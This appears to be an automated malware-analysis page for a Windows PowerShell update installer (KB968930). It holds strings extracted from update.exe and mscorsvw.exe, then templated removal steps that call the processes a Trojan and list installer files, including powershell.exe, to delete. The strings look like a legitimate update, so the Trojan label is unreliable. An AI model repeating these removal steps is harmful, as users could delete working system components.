[%s] RequestFiles %s and %s are equivalant.
[%s] Number of request retries exceeded. Give up and return.
%s%s%d
[%s] DeleteFile call failed to delete response blob %s. Error: 0x%x
[%s] Returning error: 0x%x
%s: SetFileTime on %s failed (%u)
[%s] WriteBigFile error 0x%x, writing to %s
%s: SetFilePointer error 0x%x to %s
[%s] WriteRequestData failed for %s: 0x%x
[%s] getFallbackDataForFile failed for %s: 0x%x
[%s] Error initializing ini file %s: 0x%x
[%s] Bad Alloc exception initializing ini file %s: 0x%x
[%s] Error creating 2nd request file %s: 0x%x
[%s] Bad Alloc exception creating 2nd request file %s: 0x%x
[%s] Requesting fallback for %s
[%s] Exception occured in reading Blobfile.
[%s] Exception thrown while attempting to patchapply
[%s] The target file %s already exists. Proceeding to next
[%s] MD5 of %s file is wrong (%s, %u, %u)
[%s] SafeCompleteMD5 error: 0x%x. Will request fallback
[%s] ApplyPatchToFileByBuffers returned: 0x%x. Will request fallback for %s
[%s] DeleteFile for the patch basisfile %s failed: 0x%x. Ignore and continue
[%s] ConstructFilePathInSandBox returned: 0x%x
[%s] Corrupt CRC in response blob (%s, %u, %u)
[%s] Exception X reading mapped response blob (%s, %u, %u)
[%s] Corrupt header in response blob (%s, %u, %u)
[%s] Error occured reading %u bytes from responseBlob: 0x%x
[%s] Error occured reading next request: 0x%x
[%s] Responding to a CANCEL operation
[%s] Error occured opening response %s (%u)
[%s] Error getting sandbox dir path (%u)
[%s] RequestFile parsing failed : 0x%x
[%s] Index file is missing, abort.
[%s] No files to patch
[%s] Error reading range requests (%u)
[%s] Error reading file requests from request file %s (%u)
[%s] Unable to open request file %s (%u)
[%s] GetReqFilePath failed %u
[%s] PATCH_REQUEST_CANDIDATES constructor encountered bad_alloc exception
[%s] Fallback type: 0x%x, [Off] 0x%x, [len] 0x%x
[%s] Patch Signature: 0x%x, [Off] 0x%x, [len] 0x%x
[%s] IniSection: %s
[%s] Failed reading file %s (%u)
[%s] Could not allocate %u bytes of memory
[%s] Unable to get file size for %s
[%s] Unable to open file %s
%s=%x,%x,%x,%s,%s
MyFindBranchForFileByName: Error 0x%lx while trying to retrieve branch information from %s
HfCleanUpTempFolders: Failed to remove folder %s.
VerifyIntegrationSources: Package %s not found.
VerifyIntegrationSources: Target %s not found.
MachineTypeFromFilename: Error 0x%lx while trying to retrieve machine type from %s.
ExtractPackage: Process %s failed with error 0x%lx.
%s /x:%s /q
%s\%s\svcpack\branches.inf
%s\%s\svcpack\TempCatalogStore
UpdateTargetUsingBestOf: Error, package contains file %s, which is not present in the inventory.
CopyBranchesInfToSvcPack: Error 0x%lx opening branches.inf
CopyBranchesInfToSvcPack: Error 0x%lx retrieving the version of branches.inf
%s\branches.inf
CopyBranchesInfToSvcPack: Error 0x%lx retrieving information from %s.
GetHotfixInformation: Failed to open %s with error 0x%lx
GetHotfixInformation :failed to build szFilePath for target (%s), error code 0X%x
GetHotfixInformation: unexpected failure to locate a file node by source file name %s
ProductInstall.Slipstream.Hotfix
%s\update.exe
%s\common\update.exe
PrepareTargetFile: Error 0x%lx while preparing %s.
PrepareTargetFile: Error 0x%lx while deleting compressed file %s.
PrepareTargetFile: Error 0x%lx while trying to decompress file %s.
PrepareTargetFile: failed to copy to the temporary file path buffer 0X%x
PrepareTargetFile: failed to build the temporary file path buffer 0X%x
%s\%s\%s
PrepareTargetFile: failed to get target file path length 0X%x
%s\update\update.inf
%s\update\branches.inf
%s\update\updatebr.inf
%s\xpsp1hfm.exe
IsUpdateInfValidForTarget: Build mismatch in %s: %d < %d > %d.
IsUpdateInfValidForTarget: MajorVer mismatch in %s: %d < %d > %d.
IsUpdateInfValidForTarget: MinorVer mismatch in %s: %d < %d > %d.
IsUpdateInfValidForTarget: SPLevel mismatch in %s: %d < %d > %d.
IsUpdateInfValidForTarget: Platform mismatch in %s: %s != %s.
IsUpdateInfValidForTarget: Lang mismatch in %s: %lx != %lx.
IsUpdateInfValidForTarget: Unable to retrive information from hotfix %s.
%s\update.url
IsPackageValidForTarget: Error 0x%lx while opening file %s.
IsPackageValidForTarget: branch %s is not specified in updatebr.inf
IsPackageValidForTarget: %s does not exist.
IsPackageValidForTarget: Using alternate SP level of %d to determine branch.
IsPackageValidForTarget: %s is missing or empty!
IsPackageValidForTarget: Failure reading SP level from %s line %d.
IsPackageValidForTarget: No default branch defined for SP level %d. Searching for alternate SP Level.
%s\updatebr.inf
IsPackageValidForTarget: %s does not appear to be a valid dual mode package.
%s\%s\update
%s\SP*
IsPackageValidForTarget: %s doesn't exist.
%s\update.inf
%s\update
%s\%s\svcpack\HFINT.dat
CopyHotfixAndCatalogToSvcPack: Error 0x%lx while trying to copy file %s to %s
%s\update\%s
%s\%s\svcpack\%s
%s\%s.exe
%s\%s\svcpack
FixUpSvcpackInf: Failed to open %s
FixUpSvcpackInf: Failed to write CatagSubDir key to svcpack.inf
"\%s\svcpack"
FixUpSvcpackInf: Failed to write BuildNumber key to svcpack.inf
FixUpSvcpackInf: Failed to write MinorVersion key to svcpack.inf
FixUpSvcpackInf: Failed to write MajorVersion key to svcpack.inf
FixUpSvcpackInf: Failed to write Signature key to svcpack.inf
"$WINDOWS NT$"
FixUpSvcpackInf: Failed to write [CatalogHeader] section to svcpack.inf
%s\%s\svcpack.inf
FixUpSvcpackInf: Failed to delete compressed version of svcpack.inf (0x%lx).
%s\%s\svcpack.in_
AddHotfixAndCatalogToSvcpackInf: Error 0x%lx while writing ProductCatalogsToInstall key
AddHotfixAndCatalogToSvcpackInf: Error 0x%lx while writing SetupHotFixesToRun key
AddHotfixAndCatalogToSvcpackInf: failed to build [SetupHotfixesToRun] line %s, error code 0X%x
%s.exe /q /n /z
%s.exe /q /n /z /b:%s
AddHotfixAndCatalogToSvcpackInf: There was an error fixing up SVCPACK.INF: 0x%lx
CopyHotfixFilesToSource: Error 0x%lx while copying %s to %s
AddFilesToDosNet: Error 0x%lx while trying to open %s
AddFilesToDosNet: StringCbPrintf failed to build d%d, %s, error code 0X%x
AddFilesToDosNet: failed to get string length (%s)
AddFilesToDosNet: target file path (%s) does not contain root path (%s)
AddFilesToDosNet: Error 0x%lx writing %s to %s
Stripped Dir Name:%s From: %s
d%d,%s
AddFilesToDosNet: StringCbPrintf failed to build d1, %s, error code 0X%x
d1,%s
AddFilesToDosNet: Error 0x%lx writing %s to [Directories]
AddFilesToDosNet: StringCbPrintf failed to build d%d, error code 0X%x
AddFilesToDosNet: enum key in [Diretories]: szKeyName(%s), szValue(%s)
AddFilesToDosNet: StringCbCopy failed to copy section name "Directories", error code 0X%x
%s\%s\dosnet.inf
AddOptionalSrcDirToDosNet: Error 0x%lx while writing OptionalSrcDirs info to %s
Unable to determine what type of package %s is.
GetBuildInformation: Error 0x%lx while trying to retrieve target OS version information from %s.
GetTargetOSLanguage: Error 0x%lx while trying to retrieve target OS language information from %s.
%s\%s\hivesys.inf
GetSKUInfo: Error 0x%lx was encountered while retriving SKU information from %s.
%s\%s\layout.inf
GetSKUInfo: Error 0x%lx while trying to open file %s.
GetSKUInfo: %s is an unknown SKU. ProductInfo = %d
Error 0x%lx enountered while retrieving service pack level information from %s
GetServicePackLevel: Unable to open %s. GLE = 0x%lx
%s\%s\drvindex.inf
%s\%s\svcpack\*.cat
%s\%s\*.cat
CopyCatalogFilesToTempStore: Error 0x%lx while copying %s to %s.
%s\%s\svcpack\TempCatalogStore\%s
%s\%s\*.ca_
CopyCatalogFilesToTempStore: Error 0x%lx while trying to create %s
RemoveTempCatalogStore: Error 0x%lx while removing directory %s.
RemoveTempCatalogStore: Error 0x%lx while trying to delete %s.
%s\*.*
TARGET: Branch: %s
TARGET: Version (str): %s
TARGET: Path: %s
SOURCE: Branch: %s
SOURCE: Version (str) %s
SOURCE: Path: %s
File Name: %s
PACKAGE: %s
GetFileListInformation: Error 0x%lx retrieving version information about %s
GetFileListInformation: Error 0x%lx retrieving version information from %s
GetFileListInformation: Unable to retrieve version information from %s because file lacks version resources.
%s is not a valid hotfix for %s.
Error 0x%lx while trying to open %s.
FindOverlapingPackages: Error 0x%lx retrieving file from [%s] section.
FindOverlapingPackages: Error 0x%lx while attempting to retrieve information about package %s
FindOverlapingPackages: Branch information is missing for %s.
FindOverlapingPackages: Error 0x%lx while retrieving branch information about %s.
%s\%s\svcpack\%s.exe
%s does not exist, skipping search for overlapping files.
%s\%s\svcpack\HFINT.DAT
Version: %s
Branch: %s
FileName: %s
Reinventory is required for %s: %s -> %s
IntegrateHotfix: Error 0x%lx while integrating hotfix %s.
IntegrateHotfix: Branch initialization is required for branching packages, terminating execution.
IntegrateHotfix: Error 0x%lx updating branches.inf
IntegrateHotfix: Package %s is not valid for target %s.
IntegrateHotfix: Error 0x%lx while creating the %s\%s\svcpack folder.
IntegrateHotfix: Error 0x%lx while gathering information about target %s.
WIAddKeyNode: Unable to allocate memory for new key node.
WIEnumKey: wrong input parameter pLastKey (0X%x) or inconsistent state of in memory inf, keyIndex (0X%x) secIndex(0X%x)
WIOpenInf: Error 0x%lx while reading file %s
WIOpenInf: Unable to allocate enough memory to load %s.
WIOpenInf: Error 0x%lx while opening file %s.
WIFlushToFile: Error 0x%lx while writing to file %s.
WIFlushToFile: Error 0x%lx while opening file %s.
%s=%s
WICloseInf: Error writing inf to file %s.
In Function %s, line %d, RegQueryValueEx failed with error 0x%lx
In Function %s, line %d, RegOpenKeyEx failed with error 0x%lx
In Function %s, line %d, RegQueryValueEx failed, not a DWORD type
In Function %s, line %d, RegSetValueEx failed with error 0x%lx
In Function %s, line %d, RegCreateKeyEx failed with error 0x%lx
PSShL
t0=HKLMt =HKCRt
=HKCRt
=.cabu
PSSShtP
QPSShtP
t.SSj
SSSSSSh
SSSSSSh!
SSSSSSh"
SSSSSSh#
SSSSSSh$
SSSSSSh%
SSSSSSh&
SSSSSSh'
SSSSSSh(
t.VVj
GSSSSh
;C t.WWWW
=.idau
.relu
<.uX;]
SSSShPN
PSSh<
u#SSSShL
PSSSSSSh
u"SSSh
SETUPAPI.dll
SetupDiOpenDevRegKey
CM_Open_Class_KeyA
ADVAPI32.dll
COMCTL32.dll
CRYPT32.dll
GDI32.dll
imagehlp.dll
KERNEL32.dll
MPR.dll
msvcrt.dll
ntdll.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
RPCRT4.dll
SHELL32.dll
UPDSPAPI.dll
USER32.dll
USERENV.dll
VERSION.dll
WINSPOOL.DRV
ReportEventA
RegLoadKeyA
RegUnLoadKeyA
RegCreateKeyExW
RegQueryInfoKeyA
RegSaveKeyA
RegFlushKey
RegOpenKeyA
RegSetKeySecurity
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
RegOpenKeyExA
RegCloseKey
RegOpenKeyExW
CertCreateCertificateContext
CertOpenStore
CertSetCertificateContextProperty
CertAddCertificateContextToStore
CertCloseStore
CertFreeCertificateContext
GetWindowsDirectoryW
GetProcessHeap
GetWindowsDirectoryA
_acmdln
NtYieldExecution
EnumWindowStationsA
OpenWindowStationA
GetProcessWindowStation
SetProcessWindowStation
CloseWindowStation
EnumWindows
EnumChildWindows
D:\binaries.x86fre\SCP_WPA\update.PDB
software\microsoft\active setup\installed components\{a00bf2eb-56ee-4fde-b5ea-6a8fa425b2a5}
software\microsoft\active setup\installed components\{2eac6a2d-57a8-44d4-96f7-e32bab40ca5f}
Leave issued: file = %s, line = %d, ESP = 0xx, EBP = 0xx
c:\windows\$hf_mig$\KB968930
%WinDir%
%WinDir%\$968930Uinstall_KB968930$\*
No Windows Management Framework Core
%WinDir%\INF\oem11.inf
%WinDir%\$968930Uinstall_KB968930$
c:\windows\KB968930.log
KB968930Uninst.log
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf
%WinDir%\$968930Uinstall_KB968930$\spuninst
c:\82e7796e90bb69dd8d50b4\
pdate\update.exe
%System%
:\82e7796e90bb69dd8d50b4\powershell_ise.resources.dll
lhost.resources.dll
ell.dll
lp.xml
c:\82e7796e90bb69dd8d50b4\update\update.inf
c:\windows\repair\setup.log
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.exe install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
c:\windows
Menu\Programs\Accessories\Windows PowerShell
E.RESOURCES.DLL
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe
.0 SP1 from hXXp://go.microsoft.com/fwlink/?linkid=153680 and rerun Windows Management Framework Core Setup
33333333333333330
NTDLL.DLL
ntuser.da_
sWatsonManifestMode.Cancel
WatsonManifestMode.Reboot
WatsonManifestMode.BeforeArchive
r (%s %d %s)
Wsxs.dll
ClassInstall32.NTAMD64
ClassInstall32.NTIA64
ClassInstall32.NTX86
ClassInstall32.NT
sProductInstall.ClassInfsToInstallAlways
.SPAttr
{4D36E97E-E325-11CE-BFC1-08002BE10318}
SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\update
sysoc.inf
Ocmanage.dll
%s\security\logs\%s.log
%s\security\database\%s.sdb
scecli.dll
%s%s%s
-d %s
%s%s%s%s%s
Main_ReportBtn
\system32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}
\StringFileInfo\xx\FileBranch
\inf\branches.inf
Prereq.PowerShell.Section
%WinDir%\inf\sysoc.inf
POWERSHELL_ISE.RESOURCES.DLL
LP.XML
.RESOURCES.DLL
LHOST.RESOURCES.D
ENT.DLL-HELP.XML
Press the PAGE DOWN key to see the rest of the agreement.
%s Setup
Windows Service Pack Setup
6.3.0004.1 built by: dnsrv
UPDATE.EXE
Windows
Operating System
6.3.0004.1
IDC_BLOCKLIST_SP_MSGA
IDC_BLOCKLIST_SP_MSGB
Starting process:$The update.ver file is not correct.
You can only install this update on Service Pack %d.
There is no need to install this update.?Setup failed to access or correctly modify your SETUP.LOG file.XThe version of software you are running does not match
There is not enough disk space on %%s to install %1. Setup requires a minimum of %%d additional megabytes of free space or if you also want to archive the files for uninstallation, Setup requires %%d additional megabytes of free space. Free additional space on your hard disk and then try again.RYou do not have permission to update %1.
ASetup could not find the setup.log file
in your repair directory.FSetup could not find the update.inf file
Please shutdown your system manually.SCould not locate entry for HAL.DLL in SETUP.LOG to determine type of HAL to update.
You can only install this update on Build %d to Build %d .^The version of Windows you have installed does not match the update you are trying to install.9%1 Setup could not start the hotfix installation program.'%1 Setup could not locate the %2 files.
This Web-based update requires Internet Explorer 3.0 or later.
For instructions on how to download a version of this update that does not require a Web connection during installation, download and install %1 from hXXp://VVV.Microsoft.com/Downloads
Please contact your hardware vendor for additional information on obtaining a %3 that has been qualified for your system configuration.JNot all files necessary to perform an integrated installation are present.<Cannot install %1.
The system must be restarted before installing the %1, to allow some prior file update operations to complete. (These operations were previously scheduled by some other install or uninstall operation.)
You do not have enough free disk space on %%s to archive the uninstall files. To install %1 with backup files for uninstall, an additional %%dMB is required.\Unable to locate RSAENHS.DLL in the update directory, high encryption for uninstall aborted.]Unable to locate UPDENCIN.INF in the update directory, high encryption for uninstall aborted.QUnable to locate UPDENCTS.INF in the update directory, unable to export TS files.'High encryption ENCINST process failed.2%1 Setup is ready to begin replacing system files.
Connecting to %s
Connected to %s
%dKB remaining%s
 The server did not respond (error code %d).
If this error persists after you have clicked Retry several times, download and install %1 from hXXp://VVV.Microsoft.com/Downloads. This will give you instructions on how to download a version of this update that does not require a Web connection during installation.G%1 Setup determined that the following downloaded %2 file is corrupt:
%1 Setup ErroriThe file %s is open or in use by another application.
Close all other applications and then click Retry.E%1 Setup could not backup registry key
%%s\%%s
to file %%s\%%s. %%s
%%s\%%s,\'%%s\'. %%s
Select 'OK' to undo the changes that have been made.=%%s
.Unable to print the END USER LICENSE AGREEMENT
The version of Windows you have installed is newer than the update you are trying to install. There is no need to install this update.gThis package does not apply to the operating system you are running, and therefore cannot be installed.
Applying Hotpatches!The branches.inf file is invalid.!The updatebr.inf file is invalid.&Failed to migrate dependent packages.
Details%Completing the %1 Installation Wizard
To apply the changes, the wizard has to restart Windows. To restart Windows automatically, click Finish. If you want to restart later, select the Do not restart now check box, and then click Finish.YYou have successfully completed the %1 Setup Wizard.
are also listed in the svcpack.log file.5Do you want to continue installing this service pack?YThe service pack install cannot continue until these hotfixes are applied to your system.
You can only install this update only on Build %d .
Integrating filesiPlease wait while setup integrates files from Windows Service Pack into your Windows installation folder.
Updating Your Windows Share
The product key used to install Microsoft Windows may not be valid.
For more information about why you have received this error message, and steps you can take to resolve this issue visit VVV.howtotell.com.
The core system file (kernel) used to start this computer is not a Microsoft Windows file. The Service Pack will not be installed. For more information, see Knowledge Base article %s at hXXp://support.microsoft.com.
Checking product key
[/help] [/quiet] [/passive] [/norestart] [/forcerestart] [/warnrestart] [/promptrestart] [/overwriteoem] [/nobackup] [/forceappsclose] [/integrate:<fullpath>] [/d:<path>] [/log:<fullpath>]
/passive
Creating file %s
Backing up file %s
Installing file %s
Copied file (delayed):ZAn error has occurred copying files from the Service Pack share to the distribution share..Integrated install has completed successfully.
The file %%s is missing from the %1 installation.
Press OK to cancel Setup.C%1 Setup is ready to begin upgrade of uninstall to high encryption.qIntegrated install failed. The language type or platform for the destination directory and %1 must be the same.
Copying file %sxIn order to successfully complete this installation, the following services will automatically be stopped and restarted.1Setup was unable to stop the following service:%spA reboot will probably be required in order to successfully complete this installation. Do you wish to continue?
9%1 Setup is executing. Please wait for Setup to complete.
Spawning instance %s
Updating the registry keys
Unpacking: %d remaining
readmesp.htm^Integrated install failed. The destination directory contains an evaluation copy of Windows.
Windows XP
Windows
[/help] [/quiet] [/passive] [/norestart] [/forcerestart] [/warnrestart] [/promptrestart] [/overwriteoem] [/nobackup] [/forceappsclose] [/integrate:<fullpath>] [/log:<fullpath>]
Starting service %s
Stopping service %s
Windows Server 2003
Consult the Service Pack documentation for more details about supported integration scenarios.
Windows %s has detected that one or more protected files on your computer have been modified. The Service Pack contains updated versions of those files, which work to provide a stable environment for your programs.
If you click Yes, the updated versions will overwrite the current files and you might lose certain customizations created by third-party programs, especially those that affect the graphic displayed when your computer starts up.
For more information, see Knowledge Base article <%s> at hXXp://support.microsoft.com.
You might need to restart your computer after you complete this update. To continue, click Next.MThe folder name is longer than the limit of 226 bytes.
Enter a shorter name.~Setup could not verify the integrity of the file Update.inf. Make sure the Cryptographic service is running on this computer.
This Service Pack cannot be installed on top of the %1 build currently installed on your computer. Cancel this installation process, uninstall your current %2 build, then re-install this Service Pack..An error in updating your system has occurred.
At minimum, you must have Service Pack %d installed.
The existing file %s contains High Encryption security, but the updated Hotfix file %s contains only Standard Encryption security. You can choose to replace the High Encryption security file with the updated Standard Encryption security file now, or you can skip this file to retain the existing file containing High Encryption security. See the readme.txt file for information on obtaining the updated High Encryption security components.
ONo LICENSE.TXT file was found in your Hotfix directory.
7Error reading LICENSE.TXT file.
Windows NT 4.0
Windows 2000
You might need to restart your computer after you complete this update. To continue, click Next.cPlease read the following license agreement. To continue with setup, you must accept the agreement.
Windows XP Version 2003
Express software update packages cannot be integrated. To download a version of the fix that can be integrated, visit hXXp://VVV.microsoft.com/downloads.wExtracted packages cannot be integrated. The /integrate switch must be used with the original software update package.
Send Report
Thank you for participating in our product improvement process. Microsoft treats all collected data as confidential and anonymous unless otherwise specified.%See what the restart report contains.
&Send Report
Update.EXE RestartReport
Report Restart Information
Sending this report helps us improve the user experience. We will statistically process the collected data to understand what initiated this request to restart your computer. This information will help us reduce the number of restarts caused by applying updates.

mscorsvw.exe_2508:

.text
`.data
.rsrc
@.reloc
EX_CATCH line %d
CACHE_S_FORMATETC_NOTSUPPORTED
CTL_E_GETNOTSUPPORTEDATRUNTIME
CTL_E_GETNOTSUPPORTED
CTL_E_SETNOTSUPPORTEDATRUNTIME
CTL_E_SETNOTSUPPORTED
CO_E_SERVER_EXEC_FAILURE
MK_E_INTERMEDIATEINTERFACENOTSUPPORTED
REGDB_E_KEYMISSING
OLE_E_ADVISENOTSUPPORTED
CO_E_INIT_SCM_EXEC_FAILURE
EX_THROW Type = 0x%x HR = 0x%x, line %d
ThrowHR: HR = %x
mscorsvw.pdb
_amsg_exit
_acmdln
MSVCR100_CLR0400.dll
_crt_debugger_hook
RegCloseKey
RegQueryInfoKeyW
RegOpenKeyExW
ADVAPI32.dll
GetWindowsDirectoryW
GetCPInfo
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjectsEx
USER32.dll
mscoree.dll
ole32.dll
OLEAUT32.dll
.PAVException@@
v1.0.3705
.PAVOutOfMemoryException@@
.PAVHRException@@
7 7$7(7,7074787
6$6,686\6|6
advapi32.dll
Wtsapi32.dll
kernel32.dll
mscorsvc.dll
Microsoft .NET Runtime Optimization Service
Microsoft .NET Runtime Optimization Service has been uninstalled
Failed to uninstall Microsoft .NET Runtime Optimization Service
Microsoft .NET Runtime Optimization Service has been installed
Failed to install Microsoft .NET Runtime Optimization Service
Failed to retrieve Microsoft .NET Runtime Optimization Service interface
Set service status to %d
Service control handler op %u, event type %u
\ndpsetup.bat
Created repair process in session %d, process ID %d
Unable to create repair process, error %d
Microsoft.NET\NETFXRepair.exe
Error changing token session ID, error %d
Error duplicating current process token, error %d
Error getting current process token, error %d
Session %u has become active.
Aborting repair due to unexpected wait status %u
Found active session %u
Aborting repair due to error %u from WTSEnumerateSessions
StartServiceCtrlDispatcher failed with error %d. Will try slow path
\fusion.localgac
\v2.0.50727
SOFTWARE\Microsoft\.NetFramework
v4.0.0
SOFTWARE\Microsoft\.NETFramework\NGenQueueMSI\WIN32\Default
SOFTWARE\Microsoft\.NETFramework\NGenQueue\WIN32\Default
ngenrootstorelock.dat
ngenservicelock.dat
FastStartupCheck(isPrivateRuntime=%d)
yKERNEL32.DLL
Software\Microsoft\.NETFramework
RestrictedGCStressExe
EnableInternetHREFexes
NGENServiceWaitPassiveWork
NGENServicePassiveWorkWaitTimeout
NGENServicePassiveHardDiskIdleTimeout
NGENServicePassiveExceptInputTimeout
MD_ForceNoColDesSharing
UNSUPPORTED_DbgDontResumeThreadsOnUnhandledException
DbgTransportProxyAddress
DbgRedirectCreateCmd
DbgRedirectCommonCmd
DbgRedirectAttachCmd
mscorrc.dll
v4.0.30319
.NET Runtime Optimization Service
4.0.30319.1 (RTMRel.030319-0100)
mscorsvw.exe
.NET Framework
4.0.30319.1


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1812
    mofcomp.exe:2148
    WindowsXP-KB968930-x86-ENG.exe:1332
    ngen.exe:2448
    PSCustomSetupUtil.exe:3544
    PSCustomSetupUtil.exe:1068
    PSCustomSetupUtil.exe:2112
    PSCustomSetupUtil.exe:2472
    PSCustomSetupUtil.exe:668
    PSCustomSetupUtil.exe:3252
    PSCustomSetupUtil.exe:3680
    PSCustomSetupUtil.exe:1604
    PSCustomSetupUtil.exe:3572
    PSCustomSetupUtil.exe:1456
    PSCustomSetupUtil.exe:3972
    PSCustomSetupUtil.exe:4020
    PSCustomSetupUtil.exe:2352
    PSCustomSetupUtil.exe:2008
    PSCustomSetupUtil.exe:3732
    PSCustomSetupUtil.exe:1504
    PSCustomSetupUtil.exe:2104
    wsmanhttpconfig.exe:1520
    wsmanhttpconfig.exe:1936

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\wbem\Logs\mofcomp.log (1068 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
    C:\82e7796e90bb69dd8d50b4\about_objects.help.txt (2 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.wsman.runtime.dll (33 bytes)
    C:\82e7796e90bb69dd8d50b4\about_comparison_operators.help.txt (11 bytes)
    C:\82e7796e90bb69dd8d50b4\winrmprov.mof (789 bytes)
    C:\82e7796e90bb69dd8d50b4\about_pipelines.help.txt (411 bytes)
    C:\82e7796e90bb69dd8d50b4\system.management.automation.resources.dll (3153 bytes)
    C:\82e7796e90bb69dd8d50b4\windowspowershellhelp.chm (26041 bytes)
    C:\82e7796e90bb69dd8d50b4\about_preference_variables.help.txt (37 bytes)
    C:\82e7796e90bb69dd8d50b4\about_environment_variables.help.txt (417 bytes)
    C:\82e7796e90bb69dd8d50b4\about_windows_powershell_ise.help.txt (6 bytes)
    C:\82e7796e90bb69dd8d50b4\about_variables.help.txt (6 bytes)
    C:\82e7796e90bb69dd8d50b4\about_join.help.txt (2 bytes)
    C:\82e7796e90bb69dd8d50b4\update\eula.txt (586 bytes)
    C:\82e7796e90bb69dd8d50b4\about_automatic_variables.help.txt (14 bytes)
    C:\82e7796e90bb69dd8d50b4\about_foreach.help.txt (10 bytes)
    C:\82e7796e90bb69dd8d50b4\wtrinstaller.ico (4803 bytes)
    C:\82e7796e90bb69dd8d50b4\about_pssession_details.help.txt (9 bytes)
    C:\82e7796e90bb69dd8d50b4\about_arithmetic_operators.help.txt (168 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.diagnostics.dll (998 bytes)
    C:\82e7796e90bb69dd8d50b4\about_requires.help.txt (2 bytes)
    C:\82e7796e90bb69dd8d50b4\about_arrays.help.txt (8 bytes)
    C:\82e7796e90bb69dd8d50b4\update\updspapi.dll (5940 bytes)
    C:\82e7796e90bb69dd8d50b4\about_execution_policies.help.txt (13 bytes)
    C:\82e7796e90bb69dd8d50b4\about_pssessions.help.txt (9 bytes)
    C:\82e7796e90bb69dd8d50b4\powershell.exe (7339 bytes)
    C:\82e7796e90bb69dd8d50b4\about_command_syntax.help.txt (5 bytes)
    C:\82e7796e90bb69dd8d50b4\about_functions_advanced_parameters.help.txt (962 bytes)
    C:\82e7796e90bb69dd8d50b4\filesystem.format.ps1xml (133 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.gpowershell.resources.dll (408 bytes)
    C:\82e7796e90bb69dd8d50b4\pwrshplugin.dll (802 bytes)
    C:\82e7796e90bb69dd8d50b4\winrmprov.dll (591 bytes)
    C:\82e7796e90bb69dd8d50b4\about_ws-management_cmdlets.help.txt (405 bytes)
    C:\82e7796e90bb69dd8d50b4\about_wildcards.help.txt (3 bytes)
    C:\82e7796e90bb69dd8d50b4\about_scripts.help.txt (12 bytes)
    C:\82e7796e90bb69dd8d50b4\about_hash_tables.help.txt (6 bytes)
    C:\82e7796e90bb69dd8d50b4\winrm.cmd (35 bytes)
    C:\82e7796e90bb69dd8d50b4\about_remote_troubleshooting.help.txt (146 bytes)
    C:\82e7796e90bb69dd8d50b4\about_reserved_words.help.txt (1 bytes)
    C:\82e7796e90bb69dd8d50b4\about_functions.help.txt (586 bytes)
    C:\82e7796e90bb69dd8d50b4\wsmpty.xsl (1 bytes)
    C:\82e7796e90bb69dd8d50b4\about_command_precedence.help.txt (8 bytes)
    C:\82e7796e90bb69dd8d50b4\about_regular_expressions.help.txt (5 bytes)
    C:\82e7796e90bb69dd8d50b4\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
    C:\82e7796e90bb69dd8d50b4\about_trap.help.txt (10 bytes)
    C:\82e7796e90bb69dd8d50b4\about_for.help.txt (146 bytes)
    C:\82e7796e90bb69dd8d50b4\windowsremoteshell.adm (12 bytes)
    C:\82e7796e90bb69dd8d50b4\$shtdwn$.req (788 bytes)
    C:\82e7796e90bb69dd8d50b4\wsmauto.mof (4 bytes)
    C:\82e7796e90bb69dd8d50b4\wevtfwd.dll (3351 bytes)
    C:\82e7796e90bb69dd8d50b4\about_while.help.txt (2 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
    C:\82e7796e90bb69dd8d50b4\about_special_characters.help.txt (3 bytes)
    C:\82e7796e90bb69dd8d50b4\wsmtxt.xsl (2 bytes)
    C:\82e7796e90bb69dd8d50b4\about_commonparameters.help.txt (12 bytes)
    C:\82e7796e90bb69dd8d50b4\eventforwarding.adm (2 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.consolehost.dll (3118 bytes)
    C:\82e7796e90bb69dd8d50b4\spmsg.dll (495 bytes)
    C:\82e7796e90bb69dd8d50b4\types.ps1xml (2510 bytes)
    C:\82e7796e90bb69dd8d50b4\about_if.help.txt (3 bytes)
    C:\82e7796e90bb69dd8d50b4\about_parameters.help.txt (9 bytes)
    C:\82e7796e90bb69dd8d50b4\update\update.exe (10748 bytes)
    C:\82e7796e90bb69dd8d50b4\winrsmgr.dll (2 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.graphicalhost.dll (4408 bytes)
    C:\82e7796e90bb69dd8d50b4\about_redirection.help.txt (2 bytes)
    C:\82e7796e90bb69dd8d50b4\pssetupnativeutils.exe (9 bytes)
    C:\82e7796e90bb69dd8d50b4\about_split.help.txt (10 bytes)
    C:\82e7796e90bb69dd8d50b4\update\update.inf (2457 bytes)
    C:\82e7796e90bb69dd8d50b4\about_script_blocks.help.txt (3 bytes)
    C:\82e7796e90bb69dd8d50b4\system.management.automation.dll (38414 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.security.resources.dll (9 bytes)
    C:\82e7796e90bb69dd8d50b4\winrshost.exe (22 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.management.resources.dll (508 bytes)
    C:\82e7796e90bb69dd8d50b4\about_remote_jobs.help.txt (13 bytes)
    C:\82e7796e90bb69dd8d50b4\about_switch.help.txt (489 bytes)
    C:\82e7796e90bb69dd8d50b4\winrm.ini (1956 bytes)
